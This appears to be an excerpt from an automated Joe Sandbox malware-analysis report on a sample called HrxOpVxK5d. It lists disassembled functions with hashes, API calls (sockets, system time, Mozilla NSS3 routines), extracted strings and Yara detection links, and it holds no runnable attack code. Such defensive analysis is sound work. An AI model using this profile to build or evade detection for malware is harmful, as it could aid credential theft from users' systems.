Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID:
String ID: 0m$Pm$pm$winUnlockReadLock
API String ID: 0-1940545888
Opcode ID: 8cf54a017de561db703d89405afce3f81dbbf6a8cb9d57fb06d16f93e19d08cd
Instruction ID: 145c36af6e1d0d70f73ed52ee6237c8063facc3627d6aca83d7c3f4e587fc8c3
Opcode Fuzzy Hash: 8cf54a017de561db703d89405afce3f81dbbf6a8cb9d57fb06d16f93e19d08cd
Instruction Fuzzy Hash: E0E115719083409FDB04DF28D48875ABBF1BF89718F118A2EF89997651E730D985CF82

Function 6CF564D0 Relevance: 3.2, Strings: 2, Instructions: 724COMMON

Download Yara Rule

Strings

not authorized, xrefs: 6CF56D47, 6CF56D4C
authorizer malfunction, xrefs: 6CF56E3E

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID:
String ID: authorizer malfunction$not authorized
API String ID: 0-2411240822
Opcode ID: 28cd63eb2bcd1dfbe49a8906d5b2adfc115a7e8affd05cf82d95b27930eae8b5
Instruction ID: 9d5bbf60f9eb7e8d1ce3a0010fb75af0a906d8fdf75f6e5fca7520818fb8494e
Opcode Fuzzy Hash: 28cd63eb2bcd1dfbe49a8906d5b2adfc115a7e8affd05cf82d95b27930eae8b5
Instruction Fuzzy Hash: 1C627E70A04204CFDB14CF19C484BA9BBF2FF99308F5581ADE9249B766D736E956CB80

Function 6CF76410 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON

Download Yara Rule

APIs

bind.WSOCK32(?,?,?,?,6CF76401,?,?,0000001C), ref: 6CF76422
WSAGetLastError.WSOCK32(?,?,?,?,6CF76401,?,?,0000001C), ref: 6CF76432

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: ErrorLastbind
String ID:
API String ID: 2328862993-0
Opcode ID: f456ccdb1e3c1fd0dfe4ea7f50aef8be549060bf7dd6523552c17151d2cde162
Instruction ID: e44ae789cfec9da6b4040b6c8a505c6011441eb5fd79a7a40ffb033459e7d402
Opcode Fuzzy Hash: f456ccdb1e3c1fd0dfe4ea7f50aef8be549060bf7dd6523552c17151d2cde162
Instruction Fuzzy Hash: 5CE01D351541046FDB019F75DC0892B37A5EF08228751D515F629DB5B1E631D8619750

Function 6CFDED70 Relevance: 1.7, APIs: 1, Instructions: 217memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6CFDEE3D

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Alloc_ArenaUtil
String ID:
API String ID: 2062749931-0
Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction ID: 0b0bf9836c46e73c6cdf4c08258f52aa363784e865e063dd365b7152a776df21
Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction Fuzzy Hash: 6371B072A017058BD718CF59C8806ABF7F2AFD8304F1A862DD85A97B91D770F940CB91

Function 00418CF0 Relevance: 1.6, APIs: 1, Instructions: 60timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

GetSystemTime.KERNEL32(?,02D41C70,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: SystemTimelstrcpy
String ID:
API String ID: 62757014-0
Opcode ID: d1ed29f5c71c8c403d61f91a32f7aaa8e7eb85f86e2c8648de87d2879e188534
Instruction ID: 470bfa94025adedc24e37c5607c38d4270d2eadb7b78e810e6eac55b0552b998
Opcode Fuzzy Hash: d1ed29f5c71c8c403d61f91a32f7aaa8e7eb85f86e2c8648de87d2879e188534
Instruction Fuzzy Hash: 1211D331D011089FCB04EFA9D891AEE77BAEF58314F44C05EF41667185EF386984CBA6

Function 0041D21A Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001D1D8), ref: 0041D21F

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
Instruction ID: 17ba3a89fab13532ca0ccd526d59b343203315732a49a137553a0870c120f9dd
Opcode Fuzzy Hash: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
Instruction Fuzzy Hash: B19002F465151096860457755C4D5857A905E8D64675185A1AC06D4054DBA840409529

Function 6CF346D0 Relevance: 1.0, Instructions: 958COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 165192ab78429254a883f1b3dc0cfbf635cb7e0b72e28982c3b8c1ba0a76233e
Instruction ID: 1c2e2f370eb30bd3bd132d3741c35b4e447da5075350cbc4163d5cdce039b571
Opcode Fuzzy Hash: 165192ab78429254a883f1b3dc0cfbf635cb7e0b72e28982c3b8c1ba0a76233e
Instruction Fuzzy Hash: 7C929175A04215DFCB05CF58C490AAABBF2FF89308F25929DC8196B756D732E942CBD0

Function 6CF9E5F0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: CriticalEnterExitMonitorSectionUnlockValue
String ID:
API String ID: 344640607-0
Opcode ID: af9948f9d342d7a7445994fa6157a550db367ad5e8ac2bcb9114aa89c0789896
Instruction ID: 82c8c70d3208e448b52fe7406d369dfb6737858bb7e6d9e35bcdb4de6a9515dd
Opcode Fuzzy Hash: af9948f9d342d7a7445994fa6157a550db367ad5e8ac2bcb9114aa89c0789896
Instruction Fuzzy Hash: 33D19AB6D00614DBEF019FA5D8407EEB7B5BF49708F090128E81867B41E735E91ACBE2

Function 6CF045B0 Relevance: .4, Instructions: 362COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f77f72009b823f82f8062812c4e910095e7142083f188f65e508706dede6e38
Instruction ID: 6b0aa3def2bff54154756ec89b20a3d5b94ba1287aad57c31e3f05de7eb671de
Opcode Fuzzy Hash: 8f77f72009b823f82f8062812c4e910095e7142083f188f65e508706dede6e38
Instruction Fuzzy Hash: 2CD1C372F046168BCB0CCF99C9A01AEBBF2BF98314B19856ED445DB791E775D902CB80

Function 6CF9A430 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac680a5f043daa969233e32ffe19c6ff7b1b55a5bb114e6176a6389ff9b7011b
Instruction ID: 9fe4377902f9bf8ef64ef3af401af8db070e9d6b6b2f2b4620de7d03d2d9a54e
Opcode Fuzzy Hash: ac680a5f043daa969233e32ffe19c6ff7b1b55a5bb114e6176a6389ff9b7011b
Instruction Fuzzy Hash: D5816A71B012058FEF18CF19D584BAABBF5EF88308F15816DE81A9B760DB74E945CB90

Function 6D050C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8121debd00e81065a2060d7cc1a4100d0317ed4c6870bbf663558ad6409ee32
Instruction ID: 72f9dd8675c0fd1656d2971d22abc440d8f943674f3549fd79aa7284ef5e0f45
Opcode Fuzzy Hash: a8121debd00e81065a2060d7cc1a4100d0317ed4c6870bbf663558ad6409ee32
Instruction Fuzzy Hash: 5B118F756082069FEB00DF19C89076A7BA6FF86368F14846DDC198B341DB72E916CBA0

Function 6CFC44C0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1c091acf57445ee9fa2fad922c8c735d0934ce86ce97a37e99b09d81b6f0de1
Instruction ID: e8d48c7e0379d49adbe44b624f9ead2dba1775fe32fbcdf13f5ce8b5660d30a7
Opcode Fuzzy Hash: c1c091acf57445ee9fa2fad922c8c735d0934ce86ce97a37e99b09d81b6f0de1
Instruction Fuzzy Hash: 0C11F776E002199F8B00CF99D8809AFBBF9EF8C664B554429ED19E7300D230ED108BE1

Function 6CFC4440 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48c4b9896020804da814f47ce93ff50d0d0b12221c06c3bbab0a84458c540ecf
Instruction ID: 43dc33954dbbe320e9bf6541f1319149b53bbe2bf97a6dc65501cb452abd2ecd
Opcode Fuzzy Hash: 48c4b9896020804da814f47ce93ff50d0d0b12221c06c3bbab0a84458c540ecf
Instruction Fuzzy Hash: 1011C975A002199F9B00DF59C8809EFBBF9EF4C254B16416AED18E7301D630ED15CBE1

Function 6D050D60 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction ID: ad928ce3e2be2e1ad3989ad8507e0b24f9d378226e39dc3e6141cf036817fba3
Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction Fuzzy Hash: 68E06D3AA08015E7EB148E0AC550BAD7399EF81619FA48879EC599B601D633F81387A1

Function 00419AA0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 6CFE4C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6CFD4F51,00000000), ref: 6CFE4C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CFD4F51,00000000), ref: 6CFE4C5B
PR_smprintf.NSS3(6D0BAAF9,?,0000002F,?,?,?,00000000,00000000,?,6CFD4F51,00000000), ref: 6CFE4C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6CFD4F51,00000000), ref: 6CFE4CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CFE4CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CFE4CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CFE4D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CFD4F51,00000000), ref: 6CFE4D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CFD4F51,00000000), ref: 6CFE4D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6CFE4D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6CFE4DA2
free.MOZGLUE(?), ref: 6CFE4DB9
free.MOZGLUE(00000000), ref: 6CFE4DCF

Strings

timeout, xrefs: 6CFE4C91
any, xrefs: 6CFE4C96
%s,%s, xrefs: 6CFE4C4B
slotFlags, xrefs: 6CFE4D34
ootT, xrefs: 6CFE4D1A
every, xrefs: 6CFE4CA1
rootFlags, xrefs: 6CFE4D47
0x%08lx=[%s %s], xrefs: 6CFE4D80
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6CFE4D9D
rust, xrefs: 6CFE4D22

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: c46ecfbfe6f86520899370005a73cef4493cc96ee5ad5146227b80e8e706449f
Instruction ID: cf11d2fa04f3da9c4125988575e59570acd78f333b27dd9b72769bd56be75adb
Opcode Fuzzy Hash: c46ecfbfe6f86520899370005a73cef4493cc96ee5ad5146227b80e8e706449f
Instruction Fuzzy Hash: 73416BB1C001417BEB219F999C44BBB7E65AF8A308F18412DEC194B745EB329924CB97

Function 6CFE0550 Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 182stringCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(NSS_ALLOW_WEAK_SIGNATURE_ALG,00000002,00000000,?,6CFC5989), ref: 6CFE0571

Part of subcall function 6CF71240: TlsGetValue.KERNEL32(00000040,?,6CF7116C,NSPR_LOG_MODULES), ref: 6CF71267
Part of subcall function 6CF71240: EnterCriticalSection.KERNEL32(?,?,?,6CF7116C,NSPR_LOG_MODULES), ref: 6CF7127C
Part of subcall function 6CF71240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CF7116C,NSPR_LOG_MODULES), ref: 6CF71291
Part of subcall function 6CF71240: PR_Unlock.NSS3(?,?,?,?,6CF7116C,NSPR_LOG_MODULES), ref: 6CF712A0

PR_GetEnvSecure.NSS3(NSS_HASH_ALG_SUPPORT,?,00000002,00000000,?,6CFC5989), ref: 6CFE05B7
PORT_Strdup_Util.NSS3(00000000,?,?,00000002,00000000,?,6CFC5989), ref: 6CFE05C8
strchr.VCRUNTIME140(00000000,0000003B,?,?,?,00000002,00000000,?,6CFC5989), ref: 6CFE05EC
strstr.VCRUNTIME140(00000001,?), ref: 6CFE0653
free.MOZGLUE(?,?,?,?,00000002,00000000,?,6CFC5989), ref: 6CFE0681
PORT_NewArena_Util.NSS3(00000800,?,?,?,?,00000002,00000000,?,6CFC5989), ref: 6CFE06AB
PL_NewHashTable.NSS3(00000000,6CFDFE80,?,6D02C350,00000000,00000000,?,?,?,?,?,00000002,00000000,?,6CFC5989), ref: 6CFE06D5
PL_NewHashTable.NSS3(00000000,?,6D02C350,6D02C350,00000000,00000000), ref: 6CFE06EC
PL_HashTableAdd.NSS3(?,6D0AE618,6D0AE618), ref: 6CFE070F

Part of subcall function 6CF02DF0: PL_HashTableRawAdd.NSS3(?,?,?,?,?), ref: 6CF02E35

PL_HashTableAdd.NSS3(FFFFFFFF,6D0AE618), ref: 6CFE0738
PL_HashTableAdd.NSS3(6D0AE634,6D0AE634), ref: 6CFE0752
PR_SetError.NSS3(FFFFE001,00000000,?,?,?,?,00000002,00000000,?,6CFC5989), ref: 6CFE0767

Strings

V, xrefs: 6CFE0559
flags, xrefs: 6CFE0555
NSS_ALLOW_WEAK_SIGNATURE_ALG, xrefs: 6CFE056C
NSS_HASH_ALG_SUPPORT, xrefs: 6CFE05B2
